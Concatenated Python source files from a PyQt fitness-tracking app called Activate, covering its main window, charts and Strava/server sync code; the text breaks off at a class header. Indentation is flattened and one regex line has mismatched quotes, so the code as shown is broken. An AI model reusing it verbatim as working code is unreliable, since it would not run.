def __init__(self, activities, *args, **kwargs):
self.activities = activities
super().__init__(*args, **kwargs)
self.setupUi(self)
paths.ensure_all_present()
self.settings = settings.load_settings()
self.hide_unused_things()
self.unsynced_edited_activities = get_unsynced_edited()
# Create a global map widget to be used everywhere. This is
# necessary because pyqtlet doesn't support multiple L.map
# instances.
self.map_widget = maps.MapWidget(self, self.settings)
self.activity_summary.setup(self.unit_system, self.map_widget)
self.social_activity_summary.setup(self.unit_system, self.map_widget)
self.summary.setup(self.unit_system, self.map_widget, self.activities)
self.activity_list_table.set_units(self.unit_system)
self.social_activity_list.set_units(self.unit_system)
self.activity_list_table.set_units(self.unit_system)
self.update_activity_list()
self.activity_list_table.right_clicked.connect(self.activity_list_menu)
self.summary.records_table.gone_to.connect(self.show_activity)
for widget, icon_name in (
(self.action_import, "document-open"),
(self.action_add_manual, "document-new"),
(self.action_edit, "document-edit"),
(self.action_match, "document-equal"),
(self.action_analyse, "view-statistics"),
(self.action_add_photos, "insert-image"),
(self.action_general, "settings-configure"),
(self.action_units, "measure"),
(self.action_servers, "network-server"),
(self.action_sync, "folder-sync"),
(self.action_sync_settings, "folder-sync"),
(self.export_menu, "document-send"),
(self.action_quit, "application-exit"),
):
widget.setIcon(QIcon.fromTheme(icon_name))
self.main_tab_switch(0)
def hide_unused_things(self):
self.main_tabs.setTabVisible(2, bool(self.settings.servers))
self.action_sync.setVisible(bool(self.settings.cookie))
def edit_settings(self, tab):
settings_window = activate.app.dialogs.settings.SettingsDialog()
self.settings.copy_from(settings_window.exec(self.settings, tab))
self.hide_unused_things()
def edit_general_settings(self):
self.edit_settings("General")
def edit_unit_settings(self):
self.edit_settings("Units")
def edit_server_settings(self):
self.edit_settings("Servers")
def edit_sync_settings(self):
self.edit_settings("Sync")
def add_manual_activity(self):
manual_window = activate.app.dialogs.activity.ManualActivityDialog()
data = manual_window.exec({})
if isinstance(data, dict):
self.add_activity(
activity.Activity(
data["Name"],
data["Type"],
track.ManualTrack(
data["Start Time"],
data["Distance"] * 1000,
data["Ascent"],
data["Duration"],
),
"[manual]",
data["Flags"],
data["Effort"],
data["Start Time"],
data["Distance"] * 1000,
description=data["Description"],
)
)
def update_activity_list(self):
"""Make the activity list show the correct activities."""
self.activity_list_table.setRowCount(len(self.activities))
for i, activity_ in enumerate(self.activities):
self.activity_list_table.set_id_row(
activity_.activity_id, activity_.list_row, i
)
self.activity_list_table.resizeColumnsToContents()
self.activity_list_table.default_sort()
def add_activity(self, new_activity, position=0):
"""Add an activity to list."""
activity_id = new_activity.activity_id
activity_elements = new_activity.unload(activity_list.UnloadedActivity).list_row
self.activities.add_activity(new_activity)
self.activity_list_table.add_id_row(activity_id, activity_elements, position)
def sync(self):
"""Sync with another service."""
dialog = QtWidgets.QProgressDialog("Syncing", "Cancel", 0, 0, self)
dialog.setWindowModality(Qt.WindowModal)
dialog.setMinimumDuration(0)
dialog.forceShow()
QtWidgets.qApp.processEvents()
sync.sync_state.ensure_loaded()
new_activities = sync.sync_state.sync(
{"Strava": self.settings.cookie}, self.activities
)
new_activity_count = next(new_activities)
if new_activity_count == 0:
dialog.reset()
return
dialog.setMaximum(
new_activity_count * SYNC_WAIT_DIVISIONS + GET_TICKS + ADD_TICKS
)
for progress in range(GET_TICKS, SYNC_WAIT_DIVISIONS):
dialog.setValue(progress)
time.sleep(SYNC_DELAY / SYNC_WAIT_DIVISIONS)
if dialog.wasCanceled():
dialog.reset()
return
done = False
self.activity_list_table.setSortingEnabled(False)
for index, new_activity in enumerate(new_activities):
progress += GET_TICKS
dialog.setValue(progress)
dialog.setLabelText(f"Syncing {new_activity.name}")
self.add_activity(new_activity)
progress += ADD_TICKS
dialog.setValue(progress)
if index < new_activity_count - 1:
for progress in range(progress, (index + 2) * SYNC_WAIT_DIVISIONS):
dialog.setValue(progress)
time.sleep(SYNC_DELAY / SYNC_WAIT_DIVISIONS)
if dialog.wasCanceled():
done = True
if done:
break
else:
dialog.setValue(progress + 1)
sync.sync_state.write()
self.activity_list_table.setCurrentCell(0, 0)
self.activity_list_table.setSortingEnabled(True)
self.main_tab_switch(self.main_tabs.currentIndex())
def update_activity(self, selected):
"""Show a new activity on the right on the Activities page."""
self.setUpdatesEnabled(False)
self.activity = self.activities.get_activity(
self.activity_list_table.item(selected, 0).activity_id
)
self.activity_summary.show_activity(self.activity)
self.setUpdatesEnabled(True)
def update_social_activity(self, selected):
"""Show a new activity on the right on the Social page."""
cell = self.social_activity_list.item(selected, 0)
if cell is None:
return
activity_id = cell.activity_id
self.setUpdatesEnabled(False)
try:
self.social_activity = self.social_activities.get_activity(activity_id)
except ValueError:
server = next(
s
for s in self.settings.servers
if s.name
in self.social_activities.by_id(activity_id).server.split("\n")
)
self.social_activity = activity.Activity(
**serialise.loads(
server.get_data(f"get_activity/{activity_id}"), gz=True
)
)
self.social_activities.provide_full_activity(
activity_id, self.social_activity
)
self.social_activity_summary.show_activity(self.social_activity)
self.setUpdatesEnabled(True)
def import_activities(self):
"""Import some user-given activities."""
# [1] gives file type chosen ("Activity Files (...)",
# "All Files" etc.)
filenames = QtWidgets.QFileDialog.getOpenFileNames(
self,
"Import an activity",
str(paths.HOME),
"Activity Files (*.gpx *.fit *.tcx *.gpx.gz *.fit.gz *.tcx.gz)",
)[0]
if not filenames:
return
self.activity_list_table.setSortingEnabled(False)
for filename in activate.app.dialogs.progress(
self, filenames, "Importing Activities"
):
filename = Path(filename)
try:
self.add_activity(load_activity.import_and_load(filename, paths.TRACKS))
except Exception as e:
alert_box = QtWidgets.QMessageBox()
alert_box.setText(f"Could not load {filename}:\n{e}")
alert_box.exec()
self.activity_list_table.setCurrentCell(0, 0)
self.activity_list_table.setSortingEnabled(True)
self.main_tab_switch(self.main_tabs.currentIndex())
def export_activity(self):
"""Export the original version of the activity."""
if files.has_extension(self.activity.original_name, ".gpx"):
file_type = "GPX file (*.gpx)"
elif files.has_extension(self.activity.original_name, ".fit"):
file_type = "FIT file (*.fit)"
elif files.has_extension(self.activity.original_name, ".tcx"):
file_type = "TCX file (*.tcx)"
else:
file_type = ""
out_name = files.decode_name(self.activity.original_name)
filename = QtWidgets.QFileDialog.getSaveFileName(
self, "Export Original Activity", str(paths.HOME / out_name), file_type
)[0]
if not filename:
return
self.activity.export_original(filename)
def export_as_route(self):
out_name = f"{self.activity.name}.gpx"
filename = QtWidgets.QFileDialog.getSaveFileName(
self, "Export as Route", str(paths.HOME / out_name), "GPX file (*.gpx)"
)[0]
if not filename:
return
with open(filename, "w") as f:
f.write(filetypes.gpx.to_route(self.activity))
def edit_activity_data(self):
"""
Open the Edit Activity dialog.
This then edits or deletes the activity as appropriate.
"""
previous_sport = self.activity.sport
edit_activity_dialog = (
activate.app.dialogs.activity.EditManualActivityDialog()
if self.activity.track.manual
else activate.app.dialogs.activity.EditActivityDialog()
)
return_value = edit_activity_dialog.exec(self.activity)
if not return_value:
return
# Delete activity
if return_value == activate.app.dialogs.activity.DELETE_ACTIVITY:
# Must be saved to another variable because self.activity
# changes when the row is removed
to_delete = self.activity
for row in range(len(self.activities)):
item = self.activity_list_table.item(row, 0)
if item.activity_id == to_delete.activity_id:
self.activity_list_table.removeRow(row)
break
self.activities.remove(to_delete.activity_id)
return
self.activity_list_table.setSortingEnabled(False)
for row in range(len(self.activities)):
if (
self.activity_list_table.item(row, 0).activity_id
== self.activity.activity_id
):
self.activity_list_table.set_id_row(
self.activity.activity_id,
self.activity.unload(activity_list.UnloadedActivity).list_row,
row,
)
break
self.activities.update(self.activity.activity_id)
self.update_activity(row)
self.activity_list_table.setSortingEnabled(True)
if self.activity.sport != previous_sport:
self.summary.update_activity_types_list()
self.unsynced_edited_activities.add(self.activity.activity_id)
save_unsynced_edited(self.unsynced_edited_activities)
def add_photos(self):
"""Open the Add Photos dialog."""
filenames = QtWidgets.QFileDialog.getOpenFileNames(
self,
"Add photos",
str(paths.HOME),
"Image files (*.png *.jpg *.jpeg *.gif *.bmp *.ppm *.pgm *.xpm)",
)[0]
if not filenames:
return
for filename in filenames:
self.activity.photos.append(
files.copy_to_location_renamed(Path(filename), paths.PHOTOS)
)
self.activity.save(paths.ACTIVITIES)
self.activity_summary.update()
def show_activity(self, activity_id):
self.main_tabs.setCurrentIndex(1)
self.activity_list_table.select(activity_id)
def analyse_activity(self):
"""Open a seperate window for activity analysis."""
self.activity_view = activity_view.ActivityView()
self.activity_view.setup(self.unit_system, self.map_widget)
try:
activity_ = (
self.activity
if self.main_tabs.tabText(self.main_tabs.currentIndex()) == "Activities"
else self.social_activity
)
except AttributeError:
return
self.activity_view.show_activity(activity_)
self.activity_view.closed.connect(self.activity_view_closed)
self.activity_view.create()
self.activity_view.showMaximized()
def match_activity(self):
self.activity_list_table.setUpdatesEnabled(False)
if self.action_match.text() == "Clear Match":
self.action_match.setText("Find Matching")
self.activity_list_table.filter({a.activity_id for a in self.activities})
else:
spinbox = QtWidgets.QSpinBox()
spinbox.setMinimum(1)
spinbox.setMaximum(500)
spinbox.setSuffix(" m")
tolerance = activate.app.dialogs.FormDialog(
widgets.Form({"Tolerance": spinbox})
).exec({"Tolerance": 40})
if tolerance:
tolerance = tolerance["Tolerance"]
self.activity_list_table.filter(
self.activities.get_matching(
self.activity,
tolerance=tolerance,
progress=lambda x: activate.app.dialogs.progress(
self, x, "Finding matching activities"
),
)
)
self.action_match.setText("Clear Match")
self.activity_list_table.setUpdatesEnabled(True)
def activity_view_closed(self):
self.activity_summary.show_map()
self.map_widget.remove_marker()
self.map_widget.remove_highlight()
def main_tab_switch(self, tab):
"""
Switch between the main tabs at the top.
Triggers the opened tab to update.
"""
tab_name = self.main_tabs.tabText(tab)
for action in (self.action_edit, self.action_add_photos, self.export_menu):
action.setEnabled(tab_name == "Activities")
self.activity_menu.setEnabled(tab_name != "Summary")
if tab_name == "Summary":
self.summary.summary_tab_switch()
elif tab_name == "Activities":
self.activity_summary.show_map()
if not self.activity_list_table.selectedItems():
self.activity_list_table.selectRow(0)
elif tab_name == "Social":
self.social_activity_summary.show_map()
self.social_tab_update()
else:
raise ValueError("Invalid tab")
def get_social_activities(self):
"""
Download all activities from each server.
Gets the activity list from the server, and then downloads each
activity. Also uploads missing activities.
"""
self.social_activities = activity_list.ActivityList([], None)
dialog = QtWidgets.QProgressDialog(
"Syncing",
"Cancel",
0,
len(self.settings.servers) * SYNC_PROGRESS_STEPS,
self,
)
dialog.setWindowModality(Qt.WindowModal)
dialog.setMinimumDuration(0)
dialog.forceShow()
for i, server in enumerate(self.settings.servers):
dialog.setLabelText(f"Getting activity list from {server.name}")
dialog.setValue(SYNC_PROGRESS_STEPS * i)
try:
server_activities = activity_list.from_serial(
serialise.loads(server.get_data("get_activities")), None
)
except connect.requests.RequestException:
continue
own_ids = {a.activity_id for a in self.activities}
dialog.setValue(round(SYNC_PROGRESS_STEPS * (i + 1 / 3)))
dialog.setLabelText(f"Syncing activities with {server.name}")
for j, activity_ in enumerate(server_activities):
activity_.server = server.name
if activity_.username == server.username:
aid = activity_.activity_id
if aid not in own_ids:
server.get_data(f"delete_activity/{aid}")
continue
own_ids.remove(aid)
try:
previous = self.social_activities.by_id(activity_.activity_id)
previous.server += f"\n{activity_.server}"
previous.username += f"\n{activity_.username}"
except KeyError:
self.social_activities.append(activity_)
dialog.setValue(
round(
SYNC_PROGRESS_STEPS
* (i + (1 + (j + 1) / len(server_activities)) / 3)
)
)
dialog.setValue(round(SYNC_PROGRESS_STEPS * (i + 2 / 3)))
own_ids |= self.unsynced_edited_activities
if not own_ids:
continue
dialog.setLabelText(f"Uploading activities to {server.name}")
for j, missing_id in enumerate(own_ids):
try:
server.upload_activity(self.activities.get_activity(missing_id))
with suppress(KeyError):
self.unsynced_edited_activities.remove(missing_id)
except connect.requests.RequestException:
break
dialog.setValue(
round(SYNC_PROGRESS_STEPS * (i + (2 + (1 + j) / len(own_ids)) / 3))
)
save_unsynced_edited(self.unsynced_edited_activities)
dialog.setValue(SYNC_PROGRESS_STEPS * len(self.settings.servers))
def social_tab_update(self):
self.get_social_activities()
self.social_tree.set_servers(self.settings.servers, self.social_activities)
self.social_activity_list.setUpdatesEnabled(False)
self.social_activity_list.setSortingEnabled(False)
self.social_activity_list.setRowCount(0)
self.social_activity_list.setRowCount(len(self.social_activities))
for row, activity_ in enumerate(self.social_activities):
self.social_activity_list.set_id_row(
activity_.activity_id, activity_.list_row, row
)
self.filter_social_activities()
self.social_activity_list.resizeColumnsToContents()
self.social_activity_list.default_sort()
def filter_social_activities(self):
self.social_activity_list.setUpdatesEnabled(False)
self.social_activity_list.filter_by_server(
self.social_tree.get_enabled_servers()
)
self.social_activity_list.setUpdatesEnabled(True)
@property
def unit_system(self):
system = units.UNIT_SYSTEMS[self.settings.unit_system]
for dimension, unit in self.settings.custom_units.items():
unit = units.UNIT_NAMES[unit]
system.units[dimension] = unit
return system
def activity_list_menu(self, event):
self.activity_menu.exec(event.globalPos())
def closeEvent(self, event):
self.activities.save()
return super().closeEvent(event)
def main():
"""Run the app and display the main window."""
app = QtWidgets.QApplication(sys.argv)
icon = QPixmap()
icon.loadFromData(
pkg_resources.resource_string("activate.resources", "icons/icon.png")
)
app.setWindowIcon(QIcon(icon))
app.setApplicationName("Activate")
app.setAttribute(Qt.AA_DisableWindowContextHelpButton)
main_window = MainWindow(activity_list.from_disk(paths.DATA))
main_window.showMaximized()
sys.exit(app.exec()) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/__init__.py | __init__.py |
import math
from collections import namedtuple
from datetime import datetime, timedelta
from itertools import zip_longest
from PyQt5 import QtChart, QtWidgets
from PyQt5.QtCore import QPointF, Qt, pyqtSignal
from PyQt5.QtGui import QPainter
from activate import number_formats, times, units
def axis_number_format(axis):
"""Format axis labels with the correct number of decimal places."""
interval = (axis.max() - axis.min()) / (axis.tickCount() - 1)
if interval.is_integer():
axis.setLabelFormat("%i")
else:
axis.setLabelFormat(f"%.{max(0, -math.floor(math.log10(interval)))}f")
def date_axis_format(difference: timedelta) -> str:
"""Get the formatting for a date axis based on its range."""
if difference >= timedelta(days=365):
return "MMM yyyy"
if difference >= timedelta(days=100):
return "MMMM"
if difference >= timedelta(days=5):
return "dd MMMM"
if difference >= timedelta(days=3):
return "hh:00 d MMM"
if difference >= timedelta(days=1):
return "hh:mm d MMM"
if difference >= timedelta(hours=12):
return "hh:mm"
return "hh:mm:ss"
class MinMax:
"""Keeps track of the minimum and maximum of some data."""
def __init__(self, *args):
if args:
try:
self.minimum = min(min(a) for a in args if a)
self.maximum = max(max(a) for a in args if a)
return
# No values given
except ValueError:
pass
self.minimum = None
self.maximum = None
def update(self, value):
"""Add a new value to the MinMax."""
if self.minimum is None:
self.minimum = value
self.maximum = value
self.minimum = min(self.minimum, value)
self.maximum = max(self.maximum, value)
@property
def range(self):
if self.minimum is None:
return None
return self.maximum - self.minimum
@property
def ratio(self):
if self.minimum is None:
return None
return self.maximum / self.minimum
def __bool__(self):
return self.minimum is not None and self.range > 0
def __repr__(self):
if self.minimum is None:
return f"{self.__class__.__qualname__}()"
return f"{self.__class__.__qualname__}(({self.minimum!r}, {self.maximum!r}))"
def data_to_points(data):
"""Convert a [series1, series2] of data to a list of QPointF."""
return [QPointF(*p) for p in zip(*data)]
series_gc_prevent = []
def create_axis(log=False):
if log:
axis = QtChart.QLogValueAxis()
axis.setMinorTickCount(-1)
axis.setLabelFormat("%g")
return axis
return QtChart.QValueAxis()
class ChartView(QtChart.QChartView):
mouse_moved = pyqtSignal(QPointF)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setMouseTracking(True)
def mouseMoveEvent(self, event):
self.mouse_moved.emit(self.chart().mapToValue(event.localPos()))
super().mouseMoveEvent(event)
class Chart(QtChart.QChart):
"""A chart with sensible defaults and extra functionality."""
def __init__(
self,
seriess,
widget,
unit_system,
title=None,
horizontal_ticks=16,
vertical_ticks=6,
horizontal_log=False,
vertical_log=False,
x_axis_label=True,
y_axis_label=True,
):
"""Create a new chart."""
self.widget = widget
self.unit_system = unit_system
self.horizontal_ticks = horizontal_ticks
self.vertical_ticks = vertical_ticks
self.horizontal_log = horizontal_log
self.vertical_log = vertical_log
self.x_axis_label = x_axis_label
self.y_axis_label = y_axis_label
super().__init__()
self.setAnimationOptions(self.SeriesAnimations)
self.widget.setRenderHint(QPainter.Antialiasing, True)
self.legend().hide()
x_axis = create_axis(horizontal_log)
y_axis = create_axis(vertical_log)
self.addAxis(x_axis, Qt.AlignBottom)
self.addAxis(y_axis, Qt.AlignLeft)
for series in seriess:
self.addSeries(series)
series.attachAxis(x_axis)
series.attachAxis(y_axis)
self.widget.setChart(self)
if title is not None:
self.setTitle(title)
def set_axis_dimensions(self, x_axis_dimension, y_axis_dimension):
if x_axis_dimension and self.x_axis_label:
self.x_axis.setTitleText(
self.unit_system.format_name_unit(x_axis_dimension)
)
if y_axis_dimension and self.y_axis_label:
self.y_axis.setTitleText(
self.unit_system.format_name_unit(y_axis_dimension)
)
def update_axis(self, direction, ticks, minimum, maximum):
"""Change an axis range to fit minimum and maximum."""
axis = self.axes(direction)[0]
if isinstance(axis, TimePeriodAxis):
axis.setRange(minimum, maximum)
elif isinstance(axis, QtChart.QValueAxis):
fake_axis = QtChart.QValueAxis()
fake_axis.setRange(minimum, maximum)
fake_axis.setTickCount(ticks)
fake_axis.applyNiceNumbers()
axis.setRange(fake_axis.min(), fake_axis.max())
axis.setTickCount(fake_axis.tickCount())
axis_number_format(axis)
elif isinstance(axis, QtChart.QLogValueAxis):
# Minimum must be decreased slightly to add the necessary extra tick
axis.setRange(minimum / 1.00001, maximum)
# For date axes in subclass
else:
axis.setRange(minimum, maximum)
axis.setTickCount(ticks)
def add_legend(self, names):
self.legend().show()
for name, series in zip(names, self.series()):
series.setName(name)
def remove_legend(self):
self.legend().hide()
def set_vertical_line(self, x):
x = self.mapToPosition(QPointF(x, 0)).x()
try:
self.line.setLine(x, 0, x, 999)
except AttributeError:
line = QtWidgets.QGraphicsLineItem(x, 0, x, 999)
self.widget.scene().addItem(line)
self.line = line
@property
def x_axis(self):
return self.axes(Qt.Horizontal)[0]
@property
def y_axis(self):
return self.axes(Qt.Vertical)[0]
class LineChart(Chart):
"""A chart with 1+ QLineSeries on it."""
def __init__(self, widget, unit_system, area=False, series_count=1, **kwargs):
"""Add a line chart to widget."""
seriess = []
for _ in range(series_count):
series = QtChart.QLineSeries()
if area:
area = QtChart.QAreaSeries()
area.setUpperSeries(series)
# Save series so it doesn't get garbage collected
series_gc_prevent.append(series)
series = area
seriess.append(series)
super().__init__(seriess, widget, unit_system, **kwargs)
def encode_data(self, data):
"""Convert data with a dimension to floats with correct units."""
# Convert units
data = zip(
*(
[
None if x is None else self.unit_system.encode(x, unit)
for x in series
]
for series, unit in data
)
)
# Get rid of Nones
return list(zip(*(p for p in data if None not in p)))
@property
def data_series(self):
return [
s.upperSeries() if isinstance(s, QtChart.QAreaSeries) else s
for s in self.series()
]
def clear(self):
for series in self.data_series:
series.setVisible(False)
def update(self, data):
"""
Change a line chart's data.
Input format:
(((x_values_0, x_unit), (y_values_0, y_unit)),
((x_values_1, x_unit), (y_values_1, y_unit)),
...
)
"""
if not data:
for series in self.data_series:
series.setVisible(False)
return
x_dimension = data[0][0][1]
y_dimension = data[0][1][1]
self.set_axis_dimensions(x_dimension, y_dimension)
# Convert to the correct units
data = [self.encode_data(d) for d in data]
# Extract 'real' series from an area chart
x_range = MinMax(*(d[0] for d in data))
y_range = MinMax(*(d[1] for d in data))
for data_part, series in zip_longest(data, self.data_series):
if data_part is None:
series.setVisible(False)
else:
series.setVisible(True)
series.replace(data_to_points(data_part))
# Snap axis minima to zero
if (
not self.horizontal_log
and x_range
and x_range.minimum != 0
and x_range.ratio > 3
):
x_range.minimum = 0
if (
not self.vertical_log
and y_range
and y_range.minimum != 0
and y_range.ratio > 3
):
y_range.minimum = 0
self.update_axis(
Qt.Horizontal, self.horizontal_ticks, x_range.minimum, x_range.maximum
)
self.update_axis(
Qt.Vertical, self.vertical_ticks, y_range.minimum, y_range.maximum
)
class LineChartSet:
"""A set of line charts that can be hidden and shown."""
def __init__(self, unit_system, container):
self.unit_system = unit_system
self.container = container
self.charts = {}
self.chart_views = {}
def add(self, name, area=False):
self.chart_views[name] = ChartView(self.container.parentWidget())
self.charts[name] = LineChart(
self.chart_views[name], self.unit_system, area=area
)
self.container.addWidget(self.chart_views[name], 1)
def __getitem__(self, name):
return self.charts[name]
def show(self, name):
self.chart_views[name].setVisible(True)
def hide(self, name):
self.chart_views[name].setVisible(False)
def update_show(self, name, data):
self[name].update(data)
self.show(name)
def show_line(self, x_value):
for chart in self.charts:
self.charts[chart].set_vertical_line(x_value)
def __repr__(self):
return f"<LineChartSet charts={self.charts!r}>"
class Histogram(Chart):
def __init__(self, zones, widget, unit_system):
"""Create a histogram."""
series = QtChart.QBarSeries()
bar_set = QtChart.QBarSet("", series)
series.append(bar_set)
series.setBarWidth(1)
super().__init__([series], widget, unit_system)
self.set_zones(zones)
def set_zones(self, zones):
# Use QBarCategoryAxis instead of QCategoryAxis because the
# latter allows putting values between categoreies instead of
# centring them.
cat_axis = self.x_axis
self.removeAxis(cat_axis)
cat_axis = QtChart.QCategoryAxis(self)
cat_axis.setLabelsPosition(QtChart.QCategoryAxis.AxisLabelsPositionOnValue)
# Hide the start value because zones[0] does its job
cat_axis.setStartValue(float("-inf"))
# Add initial label, handling negative infinity.
if zones[0] == float("-inf"):
cat_axis.append("\u2212\u221e", -0.5)
else:
zone_num = self.unit_system.encode(zones[0], "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), -0.5)
# Add axis labels
for position, zone in enumerate(zones[1:-1]):
zone_num = self.unit_system.encode(zone, "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), position + 0.5)
# Add final label. This should usually be infinity.
if zones[-1] == float("inf"):
cat_axis.append("\u221e", len(zones) - 1.5)
else:
zone_num = self.unit_system.encode(zones[-1], "speed")
cat_axis.append(number_formats.maybe_as_int(zone_num), len(zones) - 1.5)
cat_axis.setRange(-0.5, len(zones) - 1.5)
# One less bar than there are zones borders
series = self.series()[0]
bar_set = series.barSets()[0]
if bar_set.count() > len(zones) - 1:
bar_set.remove(0, bar_set.count() - len(zones) + 1)
elif bar_set.count() < len(zones) - 1:
for _ in range(len(zones) - 1 - bar_set.count()):
bar_set.append(0)
self.addAxis(cat_axis, Qt.AlignBottom)
series.attachAxis(cat_axis)
self.set_axis_dimensions("speed", "Time (min)")
def update(self, data):
"""Update the histogram data."""
series = self.series()[0]
bar_set = series.barSets()[0]
for position, amount in enumerate(data.values()):
bar_set.replace(position, units.MINUTE.encode(amount))
# Format the vertical axis
self.update_axis(Qt.Vertical, 15, 0, units.MINUTE.encode(max(data.values())))
class TimePeriodAxis(QtChart.QCategoryAxis):
def __init__(self, *args, **kwargs):
self.mode = "day"
super().__init__(*args, **kwargs)
def setRange(self, minimum, maximum):
super().setRange(minimum.timestamp(), maximum.timestamp())
def update_labels(self, minimum, maximum):
if self.mode == "auto":
if maximum - minimum > times.ONE_DAY * 500:
mode = "year"
elif maximum - minimum > times.ONE_DAY * 50:
mode = "month"
elif maximum - minimum > times.ONE_DAY * 10:
mode = "day"
else:
mode = "weekday"
else:
mode = self.mode
new_labels = times.get_periods(minimum, maximum, mode)
for label in self.categoriesLabels():
self.remove(label)
for position, label in new_labels:
self.append(label, position.timestamp())
class TimePeriodLineChart(LineChart):
"""A line chart with datetimes on the x axis."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.removeAxis(self.x_axis)
self.period_axis = TimePeriodAxis()
self.addAxis(self.period_axis, Qt.AlignBottom)
for series in self.series():
series.attachAxis(self.period_axis)
def encode_data(self, data):
"""
Convert the data provided to a more usable format.
Input format: ((x_values, "time"), (y_values, y_format))
Output format: (x_values, y_values)
The output values are in the correct units for display on the
chart.
"""
x_data = [self.unit_system.encode(x, data[0][1]) for x in data[0][0]]
y_data = [self.unit_system.encode(x, data[1][1]) for x in data[1][0]]
return (x_data, y_data)
def update_axis(self, direction, ticks, minimum, maximum):
"""Resize the chart axes."""
if minimum is None:
return
if direction == Qt.Horizontal:
minimum = datetime.fromtimestamp(minimum)
maximum = datetime.fromtimestamp(maximum)
self.period_axis.update_labels(minimum, maximum)
super().update_axis(direction, ticks, minimum, maximum)
class ProgressionChart(TimePeriodLineChart):
"""A chart to show total distance, time or climbing over time."""
YOption = namedtuple("YOption", ("function", "unit"))
Y_OPTIONS = {
"Distance": YOption(lambda a: a.distance, "distance"),
"Time": YOption(lambda a: a.duration.total_seconds(), "real_time"),
"Climb": YOption(lambda a: a.climb, "altitude"),
}
def update(self, summary_period, allowed_activity_types, y_mode, now, activities):
periods, data = activities.get_progression_data(
allowed_activity_types, summary_period, now, self.Y_OPTIONS[y_mode].function
)
if summary_period == "All Time":
self.period_axis.mode = "auto"
self.remove_legend()
else:
self.period_axis.mode = {
"Year": "month",
"Month": "day",
"Week": "weekday",
}[summary_period]
self.add_legend(periods)
super().update(
[((d[0], "date"), (d[1], self.Y_OPTIONS[y_mode].unit)) for d in data]
)
class FullProgressionChart(QtWidgets.QWidget):
y_changed = pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.main_layout = QtWidgets.QHBoxLayout(self)
self.box = QtWidgets.QComboBox(self)
self.box.currentTextChanged.connect(self.change_y)
self.main_layout.addWidget(self.box)
self.chart_view = QtChart.QChartView(self)
self.main_layout.addWidget(self.chart_view)
def set_units(self, unit_system):
self.unit_system = unit_system
self.chart = ProgressionChart(
self.chart_view,
self.unit_system,
series_count=5,
vertical_ticks=8,
y_axis_label=False,
)
self.box.addItems(
[
self.unit_system.format_name_unit(
self.chart.Y_OPTIONS[option].unit, name=option
)
for option in self.chart.Y_OPTIONS
]
)
def change_y(self, new_value):
for option in self.chart.Y_OPTIONS:
if option in new_value:
self.y_option = option
self.y_changed.emit()
def update(self, *args, **kwargs):
self.chart.update(*args, y_mode=self.y_option, **kwargs) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/charts.py | charts.py |
import json
import re
from datetime import datetime
import requests
from bs4 import BeautifulSoup
import activate.activity
from activate.app import load_activity, sync
EFFORT_LEVEL_RE = re.compile(r"perceivedExertion":(\d+)\.0,")
def strava_url(page: str) -> str:
return f"https://www.strava.com/{page}"
def get_strava_html(page: str, cookie: str) -> str:
response = requests.get(strava_url(page), cookies={"_strava4_session": cookie})
return response.text
def list_activities(cookie: str) -> dict:
response = requests.get(
strava_url("athlete/training?page=1"),
headers={"X-Requested-With": "XMLHttpRequest"},
cookies={"_strava4_session": cookie},
)
return {a["id"]: a for a in json.loads(response.text)["models"]}
def get_activity_data(strava_activity_id: int, cookie: str) -> requests.models.Response:
page = f"activities/{strava_activity_id}"
activity_file = requests.get(
strava_url(f"{page}/export_original"),
cookies={"_strava4_session": cookie},
stream=True,
)
return activity_file
def get_edit_page_data(strava_activity_id: int, cookie: str) -> tuple:
html = get_strava_html(f"activities/{strava_activity_id}/edit", cookie)
photo_urls = [
i.img["src"]
for i in BeautifulSoup(html, "html.parser").find_all("div", "image-wrap")
]
effort_level = EFFORT_LEVEL_RE.search(html)
if effort_level is not None:
effort_level = int(effort_level.group(1)) - 1
return photo_urls, effort_level
def sport(data):
return load_activity.convert_activity_type(data["type"], data["name"])
def update_local(activity, data):
activity.name = data["name"]
activity.sport = sport(data)
activity.flags["Commute"] = data["commute"]
activity.flags["Indoor"] = data["trainer"]
if activity.sport == "Run":
activity.flags["Treadmill"] = data["trainer"]
activity.flags["Race"] = data["workout_type"] in {1, 11}
activity.flags["Long Run"] = data["workout_type"] == 2
activity.flags["Workout"] = data["workout_type"] in {3, 12}
activity.description = (
data["description"] if data["description"] is not None else ""
)
def matches(activity, data):
return all(
(
datetime.fromisoformat(data["start_time"][:-5]) == activity.start_time,
sport(data) == activity.sport,
)
)
def sync_new(cookie, activities, sync_list):
"""
Download new activities from Strava.
Returns a generator. The first value is the number of items after
it. The other items are Activities.
"""
remote_activities = list_activities(cookie)
for activity in activities:
strava_id = sync_list.get("Strava", activity.activity_id)
if strava_id is None:
for remote_id, data in remote_activities.items():
if matches(activity, data):
sync_list.add("Strava", activity.activity_id, remote_id)
strava_id = remote_id
break
else:
continue
elif strava_id not in remote_activities:
continue
activity = activities.get_activity(activity.activity_id)
update_local(activity, remote_activities[strava_id])
activities.update(activity.activity_id)
activities.save_activity(activity.activity_id)
del remote_activities[strava_id]
yield len(remote_activities)
for strava_activity_id, data in remote_activities.items():
activity = activate.activity.from_track(
**sync.import_from_response(get_activity_data(strava_activity_id, cookie))
)
update_local(activity, data)
photo_urls, effort_level = get_edit_page_data(strava_activity_id, cookie)
activity.effort_level = effort_level
for url in photo_urls:
sync.add_photo_from_response(requests.get(url, stream=True), activity)
sync_list.add("Strava", activity.activity_id, strava_activity_id)
yield activity | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/sync/strava.py | strava.py |
import re
import shutil
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional
from uuid import UUID
from activate import serialise
from activate.app import files, load_activity, paths
from activate.app.sync import strava
FILENAME = re.compile(r'filename="(.*)"')
def download_response(response, path):
try:
filename = next(
FILENAME.finditer(response.headers["Content-Disposition"])
).group(1)
except KeyError:
filename = response.url.split("/")[-1]
filename = files.encode_name(filename, path)
with open(filename, "wb") as f:
response.raw.decode_content = True
shutil.copyfileobj(response.raw, f)
return filename
def add_photo_from_response(response, activity):
filename = download_response(response, paths.PHOTOS)
activity.photos.append(filename)
def import_from_response(response):
filename = download_response(response, paths.TRACKS)
activity = load_activity.load(filename)
activity["filename"] = filename
return activity
@dataclass
class SyncState:
